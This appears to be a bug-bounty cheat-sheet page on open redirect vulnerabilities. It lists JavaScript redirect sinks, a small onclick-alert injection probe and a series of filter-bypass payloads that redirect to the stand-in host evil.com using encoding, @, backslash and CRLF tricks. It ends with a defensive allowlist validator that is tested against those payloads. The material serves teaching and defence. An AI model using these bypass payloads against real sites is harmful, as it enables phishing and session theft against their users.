# 9. Open Redirect

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect" %}

{% embed url="https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md" %}

An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing. Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.

```
https://example.com/redirect?url=https://userpreferredsite.com
https://example.com?redirect_to=https://                %22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

location="http://exodussec.com"

document.location = "http://google.com"

document.location.href="http://google.com"

window.location.assign("http://google.com")

window['location']['href']="http://google.com"

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

```

## Open redirect bypasses

Simply try to change the domain:

```
?redirect=https://example.com --> ?redirect=https://evil.com
```

Bypass the filter when the protocol is blacklisted using `//`

```
?redirect=https://example.com --> ?redirect=//evil.com
```

Bypass the filter when a double slash is blacklisted using `\\`

```
?redirect=https://example.com --> ?redirect=\\evil.com
```

Bypass the filter when a double slash is blacklisted using `http:` or `https:`

```
?redirect=https://example.com --> ?redirect=https:example.com
```

Bypass the filter using `%40` (an encoded `@`)

```
?redirect=example.com --> ?redirect=example.com%40evil.com
```

Bypass the filter if it only checks for the domain name

```
?redirect=example.com --> ?redirect=example.comevil.com
```

Bypass the filter if it only checks for the domain name, using an encoded dot `%2e`

```
?redirect=example.com --> ?redirect=example.com%2eevil.com
```

Bypass the filter if it only checks for the domain name, using a query string / question mark `?`

```
?redirect=example.com --> ?redirect=evil.com?example.com
```

Bypass the filter if it only checks for the domain name, using an encoded hash `%23`

```
?redirect=example.com --> ?redirect=evil.com%23example.com
```

Bypass the filter using a non-ASCII symbol such as `°`

```
?redirect=example.com --> ?redirect=example.com/°evil.com
```

Bypass the filter using a URL-encoded Chinese dot `%E3%80%82`

```
?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com
```

Bypass the filter if it only allows you to control the path using a nullbyte %0d or %0a

```
?redirect=/ --> ?redirect=/%0d/evil.com
```
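The defensive counterpart to the sinks at the top of the page and to the bypass list above, as an added example (not code from this page or from the linked repositories): a server-side allowlist validator that accepts only a same-origin path or an absolute http(s) URL whose host exactly matches an assumed allowlist, and that is run against the page's own payloads. `ALLOWED_HOSTS`, `FALLBACK`, `is_safe_redirect` and `redirect_target` are names chosen for this example; `example.com` stands in for the application's own host.

```python
"""Server-side validation of a redirect target (added example).

Assumptions: the application only ever needs to send users to its own
host(s) in ALLOWED_HOSTS or to a path on the same origin, and the value
handed to redirect_target() is the raw, still percent-encoded query value.
"""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"example.com"}   # assumed allowlist for this example
FALLBACK = "/"                    # safe default when the target is rejected


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for a same-origin path or an absolute http(s) URL whose
    host is exactly in the allowlist. ``target`` is already decoded."""
    # CR, LF, NUL, tab and other control characters are never legitimate;
    # the %0d/%0a trick above depends on them reaching the Location header.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Browsers treat a backslash like a slash ("\\evil.com" acts as
    # "//evil.com"), and a legitimate target never needs one.
    if "\\" in target:
        return False
    # Same-origin relative path: exactly one leading slash. A protocol-
    # relative "//evil.com" falls through to the absolute-URL rules.
    if target.startswith("/") and not target.startswith("//"):
        return True
    parts = urlsplit(target)
    # Require an explicit http(s) scheme AND an authority. This rejects
    # "https:example.com" (no authority), "example.comevil.com",
    # "evil.com?example.com", "evil.com#example.com", "example.com/°evil.com"
    # and the ideographic-dot variant, none of which parse as absolute URLs.
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    # Userinfo ("example.com@evil.com") places the allowlisted name where
    # the browser ignores it; refuse any authority containing '@'.
    if "@" in parts.netloc:
        return False
    try:
        _ = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return False
    # urlsplit lowercases the hostname; exact membership (not endswith or
    # substring) defeats "example.com.evil.com" and "example.comevil.com".
    return (parts.hostname or "") in allowed_hosts


def redirect_target(raw_param: str) -> str:
    """Decode the query value once, validate it, and return either the
    decoded target or FALLBACK. Validate exactly the string you emit."""
    decoded = unquote(raw_param)
    return decoded if is_safe_redirect(decoded) else FALLBACK


# Constructed sample inputs: the payloads from the bypass list above,
# plus two legitimate targets, encoded as they would appear in the query.
PAGE_PAYLOADS = [
    "https://example.com/login", "/account",
    "https://evil.com", "//evil.com", "\\\\evil.com", "https:example.com",
    "example.com%40evil.com", "https://example.com%40evil.com",
    "example.comevil.com", "example.com%2eevil.com", "evil.com?example.com",
    "evil.com%23example.com", "example.com/°evil.com",
    "evil.com%E3%80%82%23example.com", "/%0d/evil.com",
]

if __name__ == "__main__":
    for payload in PAGE_PAYLOADS:
        print(f"{payload!r:42} -> {redirect_target(payload)!r}")
```

Every entry in the bypass list maps to `/` while the two legitimate targets pass through unchanged. The design choice worth copying is the shape of the check, not the blocklist: nothing here looks for `evil.com`; the function only ever says yes to the two forms it understands and treats everything else as hostile, which is what makes the encoding and delimiter tricks irrelevant.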
